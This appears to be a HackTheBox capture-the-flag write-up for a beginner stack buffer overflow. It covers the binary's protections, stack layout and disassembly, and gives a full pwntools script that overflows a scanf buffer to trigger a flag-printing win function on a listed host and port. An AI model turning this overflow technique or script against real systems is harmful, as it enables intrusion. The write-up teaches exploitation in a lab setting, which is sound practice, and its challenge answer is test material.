$ cat writeup.md…
$ cat writeup.md…
hackthebox
Task: Tutorial challenge with 64-bit ELF binary using scanf without length check. Solution: Buffer overflow to overwrite adjacent stack variable and trigger win condition.
Tutorial challenge for learning buffer overflow basics. Binary file gs — 64-bit ELF with PIE and NX enabled, but no stack canary.
Target: 94.237.63.176:35784
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
rbp-0x30 (offset -48): Buffer[32 bytes] <- user input
rbp-0x10 (offset -16): Alignment[8 bytes] <- initialized to 0x6969696969696969
rbp-0x08 (offset -8): Target[8 bytes] <- initialized to 0xdeadbeef
rbp: Saved RBP
rbp+0x08: Return address
The program uses scanf("%s") to read user input into a buffer without length checking — classic buffer overflow.
17c5: movl $0xdeadbeef, %eax 17ca: cmpq %rax, -0x8(%rbp) ; compare target with 0xdeadbeef 17ce: jne 0x17dc ; if NOT equal — jump to win 17dc: callq 0x11f5 <win> ; win() reads and prints flag.txt
If the target value is changed from 0xdeadbeef to anything else — the win() function is called.
Send 40 bytes to fill buffer (32) + alignment (8), then any additional bytes overwrite target.
[AAAA...AAAA][BBBBBBBB][CCCCCCCC]
Buffer(32) Align(8) Target(8) <- overwritten!
#!/usr/bin/env python3 from pwn import * IP = '94.237.63.176' PORT = 35784 r = remote(IP, PORT) # 40 bytes to target, then overwrite it payload = b'A' * 40 + b'BBBBBBBB' r.recvuntil(b'>') r.sendline(payload) r.recvuntil(b'HTB{', timeout=5) flag = b'HTB{' + r.recvuntil(b'}') success(f'Flag: {flag.decode()}') r.close()
Use this technique when:
scanf("%s") or gets() without length checkinggs — 64-bit ELF binarywrapper.py — exploit templateflag.txt — local test flagglibc/ — provided libc files$ cat /etc/motd
Liked this one?
Pro unlocks every writeup, every flag, and API access. $9/mo.
cat pricing.md$ grep --similar